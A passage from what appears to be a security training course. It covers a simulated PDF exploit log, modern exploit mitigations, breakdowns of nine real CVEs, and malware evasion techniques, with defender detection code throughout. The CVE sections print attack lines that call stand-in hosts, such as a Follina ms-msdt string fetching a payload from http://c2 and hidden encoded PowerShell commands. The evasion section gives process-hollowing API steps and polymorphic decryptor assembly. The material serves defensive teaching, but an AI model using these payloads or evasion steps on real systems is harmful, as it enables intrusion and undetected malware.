[00.897s] Sliding... 0x0C0C0C0C → 0x0C0D0000
[00.898s] ██ SHELLCODE EXECUTING ██
[00.899s] kernel32.dll base: 0x7C800000
[00.900s] URLDownloadToFileA resolved
[01.200s] Downloading payload...
[01.750s] backdoor.exe saved to %TEMP%
[01.780s] WinExec("backdoor.exe") called
[01.800s] ██ FULL COMPROMISE IN 1.8 SECONDS ██

>> What the victim saw: An invoice for $9,500.00
>> What actually happened: Complete system takeover

⚠ THIS IS A SIMULATION: no real exploit or shellcode was generated.

🔍 How Defenders Detect This

Static analysis: Tools like pdf-parser.py and peepdf extract and decode JavaScript from PDF streams, revealing heap spray patterns and suspicious API calls like Collab.collectEmailInfo.
Dynamic analysis: Sandboxes open the PDF in a monitored Adobe Reader instance and watch for shellcode behavior such as child process creation, network connections, or file drops.
YARA rules: Pattern match on %u0c0c%u0c0c NOP sled signatures, /OpenAction + /JavaScript combos, and known shellcode byte sequences.
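
To make the static-analysis step concrete, here is a minimal sketch of an indicator scan over JavaScript that has already been extracted and decompressed from a PDF (for example with pdf-parser.py). The function name scan_pdf_javascript and the three patterns are illustrative assumptions, not a production rule set; real detections use far more indicators and handle obfuscation.

```python
import re

# Illustrative indicators only (assumed for this sketch); real rule sets are larger.
INDICATORS = {
    # Repeated %u0c0c or %u9090 units, typical heap-spray filler
    "spray_filler": re.compile(r"(?:%u0c0c){2,}|(?:%u9090){2,}", re.IGNORECASE),
    # unescape() is the usual way %uXXXX strings are turned into raw bytes
    "unescape_call": re.compile(r"\bunescape\s*\(", re.IGNORECASE),
    # The API named in the text above as a known overflow trigger
    "collab_api": re.compile(r"Collab\.collectEmailInfo", re.IGNORECASE),
}


def scan_pdf_javascript(js_source: str) -> list[str]:
    """Return the sorted names of indicators found in decoded PDF JavaScript."""
    return sorted(
        name for name, pattern in INDICATORS.items() if pattern.search(js_source)
    )


sample = 'var s = unescape("%u0c0c%u0c0c"); Collab.collectEmailInfo({msg: s});'
print(scan_pdf_javascript(sample))
# ['collab_api', 'spray_filler', 'unescape_call']
```

A single hit is weak evidence; the combination of all three in a document that also has an /OpenAction is what makes a sample worth detonating in a sandbox.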

📐 Modern Exploitation: 64-bit & Mitigation Bypasses

The x86 (32-bit) examples above demonstrate core concepts. Modern targets are x86-64, with significant differences and additional mitigations:

64-bit Differences

Registers: RAX, RBX, RCX, ... are 64 bits wide, and RIP replaces EIP
Calling convention: The first four integer arguments go in RCX, RDX, R8, R9 (Windows x64), or the first six in RDI, RSI, RDX, RCX, R8, R9 (System V, used by Linux); only the remainder go on the stack
Address space: 48-bit virtual addresses, with user space ending at 0x00007FFF'FFFFFFFF, so 32-bit heap spray targets such as 0x0C0C0C0C no longer apply as-is
Stack alignment: RSP must be 16-byte aligned at each CALL, so shellcode needs adjustment
NX by default: 64-bit Windows and mainstream 64-bit Linux builds mark the stack non-executable by default
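
The address-space and alignment rules above are simple bit arithmetic. The sketch below assumes 48-bit canonical addressing (the common case on x86-64 without 5-level paging); the helper names are made up for illustration.

```python
USER_SPACE_MAX = 0x00007FFF_FFFFFFFF  # top of the lower (user) canonical half


def is_canonical(addr: int) -> bool:
    """True if bits 63..47 are all equal, i.e. a valid 48-bit canonical address."""
    top = addr >> 47  # the 17 bits from bit 47 up to bit 63
    return top == 0 or top == 0x1FFFF


def is_user_space(addr: int) -> bool:
    """True if the address falls in the lower canonical half."""
    return 0 <= addr <= USER_SPACE_MAX


def is_call_aligned(rsp: int) -> bool:
    """True if a stack pointer satisfies the 16-byte alignment required at CALL."""
    return rsp % 16 == 0


print(is_canonical(0x00007FFF_FFFFFFFF))  # True
print(is_canonical(0x00008000_00000000))  # False: falls in the non-canonical gap
print(is_call_aligned(0x7FFE_1238))       # False: 8 bytes off
```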

Mitigations Attackers Must Bypass

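ASLR: Randomizes the base addresses of DLLs, stack, and heap (on Windows, system DLL bases are chosen per boot, while stack and heap vary per process), so the attacker can't hardcode addresses
DEP/NX: Marks stack/heap as non-executable, so shellcode on the stack won't run
Stack Canaries: Random value placed between local buffers and the saved RIP; a linear overflow corrupts it and is detected before the function returns
CFG/CET: Control Flow Guard validates indirect call targets, and CET's shadow stack validates return addresses, so hijacked pointers and overwritten returns are caught
ROP: Not a mitigation but the standard answer to DEP. Return-Oriented Programming chains existing code gadgets instead of injecting shellcode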

Modern exploit chains typically combine an info leak (defeats ASLR by revealing a DLL base address) + a ROP chain (defeats DEP by reusing existing code) + a sandbox escape (breaks out of application isolation). Each layer adds cost and complexity, which is why exploit brokers have publicly advertised payouts in the millions of dollars for a working zero-click iOS chain.

// 08 — Real-World CVEs ⏱ 6 min · Intermediate

Notable Exploit CVEs

These are publicly documented vulnerabilities that have been weaponized in real-world attacks against governments, corporations, and individuals. Every single one has been patched — studying them reveals the patterns attackers reuse, the code paths they target, and the detection opportunities defenders can exploit. Each CVE below includes: what the vulnerability was, how attackers exploited it, the technical mechanism, and what defenders should look for.

CVE	Name	Type	CVSS	Severity	Year
CVE-2017-0199	HTA Handler	Doc / OLE	9.8	CRITICAL	2017
CVE-2017-11882	Equation Editor	Doc / Memory Corruption	7.8	HIGH	2017
CVE-2019-3568	WhatsApp VoIP	Zero-Click / Buffer Overflow	9.8	CRITICAL	2019
CVE-2021-1732	Win32k Priv Esc	Kernel / LPE	7.8	HIGH	2021
CVE-2021-30860	FORCEDENTRY	Zero-Click / Image Parser	7.8	HIGH	2021
CVE-2021-40444	MSHTML RCE	Doc / ActiveX	7.8	HIGH	2021
CVE-2022-30190	Follina	Doc / MSDT Protocol	7.8	HIGH	2022
CVE-2023-36884	Office HTML RCE	Doc / HTML Smuggling	7.5	HIGH	2023
CVE-2023-41064	BLASTPASS	Zero-Click / Image	7.8	HIGH	2023
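
The Severity column follows from the CVSS column: CVSS v3.x defines a fixed qualitative scale (0.0 None, 0.1-3.9 Low, 4.0-6.9 Medium, 7.0-8.9 High, 9.0-10.0 Critical). A small sketch of that mapping, with a function name chosen for illustration:

```python
def cvss_v3_severity(score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative severity rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS base score out of range: {score}")
    if score == 0.0:
        return "NONE"
    if score < 4.0:
        return "LOW"
    if score < 7.0:
        return "MEDIUM"
    if score < 9.0:
        return "HIGH"
    return "CRITICAL"


for score in (7.5, 7.8, 9.8):
    print(score, cvss_v3_severity(score))
# 7.5 HIGH
# 7.8 HIGH
# 9.8 CRITICAL
```

Note that the rating says nothing about real-world impact: several of the 7.8-rated bugs in the table were used in some of the most damaging campaigns on record, because a "local, user interaction required" vector still covers "victim opens a document".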

Detailed CVE Breakdowns

Each CVE below is broken down into its full technical detail — the vulnerability, how it was exploited in the wild, what the attacker's exploit looked like, and what defenders should monitor for.

CVE-2017-0199 — HTA Handler (Microsoft Office)

The Vulnerability: When a Word document contained an OLE2 embedded object linking to an external URL, Word would fetch that URL and — if the server returned content with a Content-Type: application/hta header — Word would pass the content directly to mshta.exe (the HTML Application host) for execution. This happened before any security prompt was shown to the user.

How Attackers Exploited It: The attacker crafted a .docx file with an embedded OLE object whose relationship target pointed to http://attacker.com/payload.hta. The document.xml.rels file contained: Target="http://attacker.com/payload.hta" TargetMode="External". When the victim opened the document, Word fetched the URL silently. The attacker's server returned an HTA file containing VBScript that ran Shell("powershell -enc [base64_payload]"). This executed arbitrary PowerShell commands with the user's privileges.

Detection: Monitor for mshta.exe spawned as a child process of WINWORD.EXE. Look for outbound HTTP requests from Office processes. YARA rule: match on OLE2Link + external URL in relationship files.

CVE-2017-11882 — Equation Editor Buffer Overflow

The Vulnerability: Microsoft's Equation Editor (EQNEDT32.EXE) was a 17-year-old component compiled in November 2000 without ASLR, DEP, or stack canaries. It processed OLE Equation objects embedded in Office documents. A font name field in the MTEF (MathType Equation Format) data had a fixed 48-byte buffer with no bounds checking. Writing more than 48 bytes into this field overflowed the stack and overwrote the return address.

How Attackers Exploited It: The exploit embedded a crafted Equation object inside a .docx file. The font name field was filled with 44 bytes of padding + the address 0x00402114 (a fixed address inside EQNEDT32.EXE pointing to a WinExec() gadget, reliable because no ASLR). After the return address, the attacker placed a command string like cmd /c powershell -nop -w hidden -enc [base64]. When Equation Editor processed the font name, it overflowed → returned into WinExec → executed the command. The entire exploit payload was 92 bytes.

Why It Was So Dangerous: No ASLR meant the return address never changed. No DEP meant stack data could be executed. No canaries meant the overflow was never detected. The exploit worked reliably across every Windows version and every Office version that shipped EQNEDT32.EXE — for 17 years of installs.

Detection: Monitor for EQNEDT32.EXE spawning child processes (it should never do this). YARA rule: match on Equation OLE CLSID {0002CE02-0000-0000-C000-000000000046} with font name length > 48 bytes.

CVE-2019-3568 — WhatsApp VoIP Buffer Overflow

The Vulnerability: WhatsApp's VoIP (Voice over IP) implementation used the SRTP (Secure Real-time Transport Protocol) stack to process incoming call setup packets. A buffer overflow existed in the SRTCP (SRTP Control Protocol) handler that parsed incoming packet data. The parser read a length field from the packet and used it to copy data into a fixed-size buffer — without validating that the length was within bounds.

How Attackers Exploited It: The NSO Group's Pegasus spyware used this vulnerability. The attack was completely zero-click: the attacker sent a specially crafted SRTCP packet by initiating a call to the victim's phone number. The victim's phone didn't even need to answer — WhatsApp processed the call setup packet automatically. The overflow in the SRTCP handler hijacked control flow and loaded the Pegasus payload, which gained full access to the device (messages, camera, microphone, GPS, passwords). The call log entry was then deleted so the victim saw nothing.

Detection: Correlate incoming WhatsApp calls with no call log entry. Monitor for unexpected process memory modifications after WhatsApp network activity. WhatsApp published hashes of the exploit packets for forensic analysis.

CVE-2021-1732 — Win32k Privilege Escalation

The Vulnerability: A type confusion bug in the Windows kernel's win32kfull!xxxClientAllocWindowClassExtraBytes function. When a window was created with extra bytes (cbWndExtra), the kernel allocated memory and returned a pointer. An attacker could manipulate the window creation process to cause the kernel to use a user-mode callback that returned a different allocation — creating a type confusion where the kernel treated user-controlled data as a kernel object pointer.

How Attackers Exploited It: This was a privilege escalation exploit — used after initial access (e.g., via a document exploit) to go from user-level to SYSTEM. The attacker created a window with specific cbWndExtra value, hooked the user-mode callback xxxClientAllocWindowClassExtraBytes, returned a crafted buffer from the callback, and the kernel wrote a kernel pointer into attacker-controlled memory. This gave arbitrary kernel read/write, used to steal the SYSTEM process token and assign it to the attacker's process.

The Chain: Often seen as Stage 2 in attack chains — a document exploit gains initial code execution (Stage 1), then CVE-2021-1732 escalates to SYSTEM (Stage 2), then the attacker dumps credentials with Mimikatz (Stage 3).

Detection: Monitor for user-mode processes making unusual NtUserConsoleControl syscalls. Kernel exploit artifacts include processes with SYSTEM token that were launched from browser or Office contexts.

CVE-2021-30860 — FORCEDENTRY (NSO Pegasus)

The Vulnerability: An integer overflow in Apple's CoreGraphics framework, specifically in the JBIG2 image decoder used to render PDF content in iMessage. JBIG2 is a lossless compression standard for bi-level (black and white) images. Apple's implementation had a flaw where a crafted JBIG2 stream with specific segment parameters could cause an integer overflow in a size calculation, leading to a heap buffer overflow.

How Attackers Exploited It: NSO Group sent an iMessage to the target containing a PDF file disguised as a .gif (iMessage rendered it automatically, zero-click). The PDF contained a JBIG2 stream with over 70,000 segment commands that, taken together, defined a virtual computer architecture. The JBIG2 segments were used as logical operations (AND, OR, XOR, NOT) on memory regions, implementing a full virtual machine with registers, an ALU, and conditional branching — all within the JBIG2 decompression engine. This VM then bootstrapped a more capable exploit that escaped the iMessage sandbox to install Pegasus.

Why This Was Unprecedented: Google Project Zero called it "one of the most technically sophisticated exploits we've ever seen." The attacker built a Turing-complete computer inside an image decoder — no JavaScript, no JIT, no scripting engine. Pure data manipulation through a compression standard's legitimate operations.

Detection: Look for PDF files received via iMessage with unusually large JBIG2 streams (>10KB is suspicious). Apple added BlastDoor sandbox in iOS 14 to isolate iMessage parsing, but FORCEDENTRY bypassed it. iOS 15 hardened JBIG2 parsing significantly.

CVE-2021-40444 — MSHTML ActiveX RCE

The Vulnerability: Microsoft's MSHTML (Trident) engine — the same engine behind Internet Explorer — could be invoked by Office documents to render HTML content. A flaw allowed a specially crafted ActiveX control to be downloaded and instantiated through MSHTML when processing Office documents with embedded HTML content. The ActiveX control could execute arbitrary code because Office did not properly restrict which controls could be loaded.

How Attackers Exploited It: The attacker sent a .docx file that contained a document.xml.rels relationship pointing to an external HTML page: http://attacker.com/exploit.html. When Word loaded this page through MSHTML, the HTML contained an <object> tag that downloaded a .CAB file from the attacker's server. Inside the CAB was a malicious .DLL renamed with a .INF extension. MSHTML extracted the CAB, loaded the DLL via a crafted directory traversal path in the CAB extraction, and the DLL began executing as a child of Word — downloading and running a Cobalt Strike beacon.

Detection: Monitor for WINWORD.EXE making HTTP requests to external servers. Look for .CAB file extraction in temporary directories. YARA rule: match on mhtml: protocol handler references in document.xml.rels.

CVE-2022-30190 — Follina (MSDT Protocol Attack)

The Vulnerability: The ms-msdt: protocol handler (Microsoft Support Diagnostic Tool) accepted command-line arguments via URL. When an Office document loaded an external HTML page that used the ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=..." URL scheme, MSDT would launch and process the parameters. The IT_BrowseForFile parameter was expanded by sdiagnhost.exe using PowerShell's Invoke-Expression — meaning any value in this parameter became executable PowerShell code.

How Attackers Exploited It: The attack chain was: (1) .docx with external relationship → (2) Word fetches HTML from attacker server → (3) HTML contains: location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=$(IEX($(Invoke-RestMethod http://c2/payload.ps1))\"" → (4) MSDT launches → (5) sdiagnhost.exe runs PowerShell → (6) attacker has code execution. Critically, this worked even in Protected View for .RTF files — the preview pane in Windows Explorer triggered it without even opening the file.

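Detection: Monitor for msdt.exe or sdiagnhost.exe spawned as children of Office processes. Mitigation: Microsoft's interim workaround was to disable the ms-msdt protocol handler by backing up and then deleting its registry key: reg export HKEY_CLASSES_ROOT\ms-msdt <backup-file>, followed by reg delete HKEY_CLASSES_ROOT\ms-msdt /f.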

CVE-2023-36884 — Office HTML RCE (Storm-0978)

The Vulnerability: A complex chain of vulnerabilities in how Microsoft Office processed HTML content through the MSHTML engine. Multiple security checks could be bypassed using special URL constructions and file path handling, allowing remote code execution when a user opened a specially crafted Office document — even with macros disabled.

How Attackers Exploited It: The Russian threat group Storm-0978 (RomCom) used this in targeted attacks against NATO summit attendees and Ukrainian government organizations. The attack used a crafted .docx file that triggered a chain of HTML loads, each bypassing a different security boundary. The document loaded external HTML through MSHTML, which loaded additional content via search-ms: protocol handler, eventually achieving code execution through a Mark-of-the-Web bypass combined with a SmartScreen bypass. The final payload was the RomCom backdoor — a full RAT (Remote Access Trojan) with keylogging, screen capture, and data exfiltration capabilities.

Detection: Monitor Office processes for chains of child process creation. Look for search-ms: protocol handler invocations from document contexts. Block outbound HTTP from Office processes with firewall rules. Microsoft released emergency mitigations before the patch was ready.

CVE-2023-41064 — BLASTPASS (NSO Pegasus, Again)

The Vulnerability: A buffer overflow in Apple's ImageIO framework, specifically in the WebP image decoder (libwebp). The vulnerability existed in the Huffman coding table construction used during WebP lossless decompression. A crafted WebP image with malformed Huffman codes caused a heap buffer overflow when the decoder attempted to build the lookup table.

How Attackers Exploited It: NSO Group combined this with a second vulnerability (CVE-2023-41061, a PassKit/Wallet validation bypass) in a two-step zero-click chain. Step 1: An iMessage was sent containing a PassKit attachment (.pkpass file — normally used for Apple Wallet passes). The PassKit attachment contained a crafted WebP image that triggered CVE-2023-41064 heap overflow during automatic thumbnail generation. Step 2: The heap overflow exploited the Wallet validation bypass (CVE-2023-41061) to escape the BlastDoor sandbox that Apple had specifically built to prevent FORCEDENTRY-style attacks. The combined chain installed Pegasus spyware with full device access.

Why It Matters: This showed that even after Apple built BlastDoor specifically to stop zero-click iMessage exploits, NSO Group found a way around it within about three years, by chaining a different parser (WebP in ImageIO) with a different sandbox escape (PassKit instead of JBIG2). The underlying libwebp bug, tracked separately as CVE-2023-4863, also affected Chrome, Firefox, and virtually every application that used libwebp, making it one of the most impactful image parser bugs in history.

Detection: Update to iOS 16.6.1+. Monitor for unusually large .pkpass files received via iMessage. Apple's Lockdown Mode blocks PassKit previews in iMessage, which would have prevented this chain.

🔍 Pattern Recognition for Defenders

Across all 9 CVEs above, notice the recurring patterns: (1) Parser vulnerabilities — every exploit targets code that parses complex data formats (OLE, JBIG2, WebP, SRTCP, PDF). (2) Privilege boundaries — attackers chain user-mode exploits with kernel exploits (CVE-2021-1732) or sandbox escapes (BLASTPASS). (3) Legacy components — EQNEDT32.EXE (17 years old), MSHTML/Trident (deprecated but still loadable), MSDT (rarely used diagnostic tool). (4) Protocol handlers — ms-msdt:, search-ms:, mhtml: — these URL schemes bridge security boundaries. Disabling unnecessary protocol handlers and removing legacy components dramatically reduces attack surface.
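
Several of the Detection notes above reduce to the same check: a document-handling process spawning something it has no business spawning. Below is a minimal sketch of that rule applied to process-creation events (such as Sysmon Event ID 1 records). The two sets are illustrative assumptions drawn from the CVEs in this section and would need tuning for a real environment.

```python
# Parents and children named in the Detection notes above (illustrative, not exhaustive).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SUSPICIOUS_CHILDREN = {"mshta.exe", "msdt.exe", "powershell.exe", "cmd.exe"}


def _basename(image_path: str) -> str:
    """Lower-cased file name from a Windows or POSIX style path."""
    return image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious_spawn(parent_image: str, child_image: str) -> bool:
    """Flag Office-family parents that launch script hosts or shells."""
    parent = _basename(parent_image)
    child = _basename(child_image)
    if parent == "eqnedt32.exe":
        return True  # Equation Editor should never spawn any child process
    return parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN


print(is_suspicious_spawn(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                          r"C:\Windows\System32\mshta.exe"))   # True
print(is_suspicious_spawn(r"C:\Windows\explorer.exe",
                          r"C:\Windows\System32\cmd.exe"))     # False
```

Parent-child rules are cheap and catch the document exploits in this list, but they do nothing for the zero-click mobile chains, which never cross a process boundary that this kind of telemetry can see.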

// 09 — FUD & Evasion ⏱ 20 min · Advanced

How Malware Goes Fully Undetected

You've seen how exploits work — the buffer overflows, the shellcode, the PDF weaponization. But here's the reality: none of that matters if antivirus catches it on delivery. This is where FUD — Fully Undetectable — comes in. Every serious attacker spends more time making their payload invisible than building the exploit itself. This section breaks down every layer of the evasion stack, the exact tools and techniques used, and how defenders catch each one.

⚠️ Educational Context Only

This section explains evasion techniques so defenders and security analysts understand what they're up against. Every technique described here is documented in public threat intelligence reports, academic papers, and vendor advisories. Understanding evasion is essential for writing detection rules, tuning EDR policies, and conducting threat hunting. The goal: if you know how they hide, you know where to look.

What Does "FUD" Actually Mean?

In underground markets, FUD = Fully Undetectable — meaning a payload that returns 0 detections across all antivirus engines when scanned. The term comes from a simple test: upload your malware to a multi-scanner, check the results.

0 / 72: FUD (zero detections). Price: $300-$2,000/month

3 / 72: UD (mostly undetected). Acceptable for targeted attacks

47 / 72: Burned (widely detected). Useless, needs re-FUD

FUD lifespan: A fresh FUD payload typically lasts 24-72 hours before cloud-based AV (telemetry, behavioral ML, community submissions) picks it up. APT groups maintain dedicated teams that re-FUD payloads continuously. The underground economy charges $50-$150 per "re-crypt" to restore FUD status.

🔄 The Detection Pipeline — What Every Payload Must Survive

A file goes through 5 stages of analysis before it detonates on a target. Evasion means beating ALL of them:

① Static Signature: YARA-like byte pattern matching against known malware databases. Speed: microseconds. Bypass: change the bytes (encryption, packing, polymorphism).

② Heuristic Analysis: Rules that flag suspicious characteristics — high entropy, no imports, suspicious section names, packer signatures. Bypass: entropy reduction, import reconstruction, legitimate-looking PE structure.

③ Behavioral/Emulation: AV emulates the first ~1000 instructions in a mini sandbox to see what the code does. Bypass: environmental checks, delayed execution, anti-emulation tricks.

④ Cloud/ML Analysis: File hash and metadata sent to cloud for machine learning classification. Bypass: unique hash per target, metadata spoofing, signed executables.

⑤ Full Sandbox Detonation: File executed in an instrumented VM for 2-5 minutes. Monitors: API calls, network traffic, registry, file system. Bypass: VM detection, timing attacks, user interaction requirements.

Layer 1 — Packers & Crypters (Static Evasion)

The first and most fundamental evasion layer. The goal: make the file look like something it isn't so signature scanners can't pattern-match it.

📦 Packers — Compressing the Binary

What they do: Compress the entire executable into a compressed blob, then prepend a small "stub" that decompresses it into memory at runtime. The original code never exists on disk in readable form.

How it works:

Original EXE (100 KB)
├── .text  → executable code (detectable)
├── .data  → strings like "WinExec" (detectable)
└── .rsrc  → resources

After UPX packing (40 KB):
├── UPX0  → empty (will be filled at runtime)
├── UPX1  → compressed blob (looks like random data)
└── stub  → 2KB decompressor
    └── At runtime: decompress UPX1 → UPX0 → jump to OEP

Common packers:

UPX — Free, open source. Reduces size 50-70%. Easily detected and unpacked. Used by script kiddies and some commodity malware.
Themida/WinLicense — Commercial protector ($200-$1500). VM-based code virtualization, anti-debug, anti-dump. Used by banking trojans (Dridex, TrickBot).
VMProtect — Commercial ($200-$700). Converts x86 to proprietary bytecode executed by built-in VM. Extremely hard to reverse. Used by APT groups and game cheats alike.
ASPack / PECompact — Lightweight commercial packers. Low overhead, quick to deploy. Common in older malware families.

Detection: YARA rules for packer stubs (UPX! magic bytes), section name patterns (UPX0/UPX1), abnormal section entropy (>7.0), tiny import table (only LoadLibrary + GetProcAddress).
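
The "abnormal section entropy (>7.0)" heuristic refers to Shannon entropy measured in bits per byte, which ranges from 0.0 (one repeated value) to 8.0 (uniformly random). A minimal sketch of the calculation follows; the 7.0 threshold comes from the text above, and reading sections out of a real PE file (for example with the third-party pefile package) is left out to keep the example self-contained.

```python
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(
        (count / total) * math.log2(count / total)
        for count in Counter(data).values()
    )


def looks_packed(section_bytes: bytes, threshold: float = 7.0) -> bool:
    """Heuristic from the text: flag sections whose entropy exceeds the threshold."""
    return shannon_entropy(section_bytes) > threshold


plain = b"This program cannot be run in DOS mode. " * 64
random_like = os.urandom(64 * 1024)  # stands in for compressed or encrypted data

print(round(shannon_entropy(plain), 2), looks_packed(plain))
print(round(shannon_entropy(random_like), 2), looks_packed(random_like))
```

Entropy alone produces false positives on installers, embedded images, and other legitimately compressed data, which is why it is usually combined with the other signals listed above.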

🔐 Crypters — Encrypting the Payload

What they do: Encrypt the malware payload with AES/RC4/XOR, bundle it with a "stub" (decryptor) that decrypts and executes it in memory. The encrypted payload has zero recognizable signatures.

Architecture:

Crypter Output:
┌─────────────────────────────┐
│  STUB (clean decryptor)     │ ← Looks legitimate
│  ├── AES key (embedded)     │
│  ├── Decrypt routine        │
│  └── Execution method:      │
│      ├── RunPE (hollowing)  │
│      ├── Reflective inject  │
│      └── Shellcode execute  │
├─────────────────────────────┤
│  ENCRYPTED PAYLOAD          │ ← AES-256 encrypted
│  (rat.exe, stealer.exe)     │    No signatures visible
│  Entropy: ~7.99/8.00        │
└─────────────────────────────┘

Stub types:

Scantime FUD — Defeats static scanning only. Payload decrypts on disk then runs normally. Cheaper ($20-50). Caught by behavioral.
Runtime FUD — Decrypts in memory only, never touches disk in plaintext. Uses process injection to run inside a legitimate process. Defeats static + behavioral ($100-500).
Native stub — Written in C/C++, no .NET dependency. Smaller, faster, harder to decompile than managed code stubs.
.NET stub — Uses Assembly.Load() for in-memory .NET payload execution. Easy to build, but .NET metadata gives defenders more to analyze.

Detection: High entropy sections, small import table, suspicious API sequences (VirtualAlloc → memcpy → VirtualProtect(PAGE_EXECUTE) → CreateThread), decryption loop patterns in code.

💰 The FUD Economy

Underground forums and Telegram channels sell FUD services as subscriptions. Typical pricing:

Crypter subscription: $30-150/month — includes daily stub updates to maintain FUD status

Single crypt: $15-50 — one-time encryption, FUD lasts 1-3 days

Private/custom crypter: $500-5,000 — hand-coded, unique stub, shared with <5 customers

FUD checking services: Private scanners (like antiscan.me) that test against 30+ AV engines without submitting samples to vendors (unlike VirusTotal which shares with all vendors)

Layer 2 — Polymorphic & Metamorphic Engines

Packers and crypters change how the payload looks on disk. Polymorphic and metamorphic engines go further — they change the code itself while preserving functionality.

🔀 Polymorphic Code — Same Logic, Different Bytes

Each time the malware copies itself or is generated, the decryption routine changes while the encrypted payload stays the same. The decryptor uses different registers, different instruction orders, and inserts junk code — so no two copies share the same byte signature.

// Generation 1:
MOV ECX, 0x1A4          ; payload length
MOV ESI, offset payload  ; source
decrypt:
XOR BYTE [ESI], 0x5A    ; XOR key
INC ESI
LOOP decrypt            ; repeat ECX times

// Generation 2 (same logic, different bytes):
MOV EDX, 0x1A4          ; different register
LEA EDI, [payload]      ; different addressing
SUB EDI, 1
next: INC EDI
      XOR BYTE [EDI], 0x5A
      DEC EDX
      JNZ next           ; different loop construct

Detection: Emulation — let the AV run the decryptor, then scan the decrypted payload. Cloud ML on behavioral patterns rather than bytes.

🧬 Metamorphic Code — Complete Self-Rewriting

The entire malware rewrites itself — not just the decryptor but the actual functional code. Techniques include: NOP insertion, register reassignment, instruction reordering, equivalent instruction substitution, code transposition, and junk code insertion.

Substitution examples:
XOR EAX, EAX       ↔  SUB EAX, EAX      ↔  MOV EAX, 0
ADD EAX, 5         ↔  SUB EAX, -5        ↔  LEA EAX, [EAX+5]
CMP EAX, 0; JE     ↔  TEST EAX, EAX; JZ  ↔  OR EAX, EAX; JZ
PUSH EAX; POP EBX  ↔  MOV EBX, EAX
NOP                ↔  XCHG EAX, EAX      ↔  LEA EAX, [EAX]

Code transposition:
Original: [Block A] → [Block B] → [Block C]
Rewritten: [Block C] → JMP end
           [Block A] → JMP B_addr   (entry point)
           [Block B] → JMP C_addr

Detection: Control flow graph analysis, behavioral signatures, code normalization (reduce equivalent instructions to canonical form before matching).
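
Code normalization can be illustrated with a toy canonicalizer: equivalent instructions are rewritten to one agreed form and padding is dropped, so that variants of the same logic compare equal. The rule table below covers only the substitutions listed above and operates on text mnemonics; it is a sketch under those assumptions, and real engines work on lifted intermediate representations and track flag side effects, which this ignores.

```python
import re

# (pattern, replacement) pairs mapping equivalent forms to one canonical form.
CANONICAL_RULES = [
    (re.compile(r"^(?:xor|sub) (\w+),\s*\1$"), r"mov \1, 0"),   # zeroing idioms
    (re.compile(r"^(?:test|or) (\w+),\s*\1$"), r"cmp \1, 0"),   # zero tests
    (re.compile(r"^jz\b"), "je"),                               # alias mnemonics
    (re.compile(r"^xchg eax,\s*eax$"), "nop"),                  # NOP equivalents
    (re.compile(r"^lea (\w+),\s*\[\1\]$"), "nop"),
]


def normalize(instruction: str) -> str:
    """Rewrite a single instruction to its canonical textual form."""
    text = " ".join(instruction.lower().split())  # lower-case, collapse whitespace
    for pattern, replacement in CANONICAL_RULES:
        text = pattern.sub(replacement, text)
    return text


def normalize_listing(instructions: list[str]) -> list[str]:
    """Normalize every instruction and drop NOP padding."""
    return [n for n in map(normalize, instructions) if n != "nop"]


variant_a = ["XOR EAX, EAX", "NOP", "TEST EBX, EBX", "JZ done"]
variant_b = ["SUB EAX,EAX", "XCHG EAX, EAX", "LEA ECX, [ECX]", "OR EBX, EBX", "JE done"]
print(normalize_listing(variant_a) == normalize_listing(variant_b))  # True
```

Once both variants reduce to the same listing, a single signature over the normalized form matches every generation that uses only these substitutions.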

Layer 3 — Process Injection & In-Memory Execution

The most effective evasion: never write the real payload to disk at all. Instead, inject it directly into the memory of a legitimate process. To the OS and security tools, it looks like svchost.exe or explorer.exe is running — but the attacker's code lives inside it.

🧪 Process Hollowing (RunPE)

The most common technique used by crypters. Creates a legitimate process in a suspended state, hollows out its memory, writes the malicious PE, then resumes execution.

Step-by-step:
1. CreateProcess("svchost.exe", CREATE_SUSPENDED)
   → Real svchost starts but frozen before first instruction

2. NtUnmapViewOfSection(hProcess, imageBase)
   → Guts removed — original svchost code unmapped

3. VirtualAllocEx(hProcess, imageBase, malwareSize, MEM_COMMIT)
   → Fresh memory allocated at same address

4. WriteProcessMemory(hProcess, imageBase, malwarePE)
   → Malware PE written into svchost's memory space

5. SetThreadContext(hThread, newEntryPoint)
   → EIP/RIP pointed to malware's entry point

6. ResumeThread(hThread)
   → "svchost.exe" is now running your malware
   → Task Manager shows: svchost.exe (legitimate name+path)
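   → Parent process: the launcher itself, unless the attacker also spoofs the parent PID; a svchost.exe whose parent is not services.exe is a classic detection signal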

MITRE: T1055.012 Process Hollowing

💉 Other Injection Techniques

Classic DLL Injection — CreateRemoteThread(LoadLibrary, "malware.dll"). Drops DLL to disk, injects into target process. Oldest method, well-detected. T1055.001
Reflective DLL Injection — DLL loaded entirely from memory using a custom loader. Never touches disk. Uses a reflective loader function inside the DLL itself that manually maps sections, resolves imports, calls DllMain. Used by Cobalt Strike, Metasploit. T1620
APC Injection — QueueUserAPC(shellcode, hThread). Queues malicious code to run next time the target thread enters an alertable wait state. Stealthier than CreateRemoteThread. T1055.004
Thread Hijacking — Suspend a thread, modify its RIP/EIP to point to shellcode, resume. No new thread created = less suspicious. T1055.003
Module Stomping — Overwrite the .text section of a legitimate DLL (e.g., amsi.dll) already loaded in process memory. Code runs from a backed (legitimate) memory region — avoids "unbacked executable memory" detections.
Early Bird Injection — Queue APC before process initialization completes. Runs before EDR hooks are in place. T1055.004

Detection: Monitor for cross-process memory operations: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread from a process that shouldn't be doing this. EDR hooks these APIs at the ntdll level.
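
The cross-process rule above can be sketched as a small state machine that tracks, per (source, target) process pair, how far through the allocate, write, execute chain that pair has progressed. The event tuple format is an assumption for this example; real EDR telemetry has its own schema and many more API variants (NtMapViewOfSection, QueueUserAPC, and so on).

```python
from collections import defaultdict

# Ordered API chain from the detection note above.
INJECTION_CHAIN = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


def find_injection_pairs(events):
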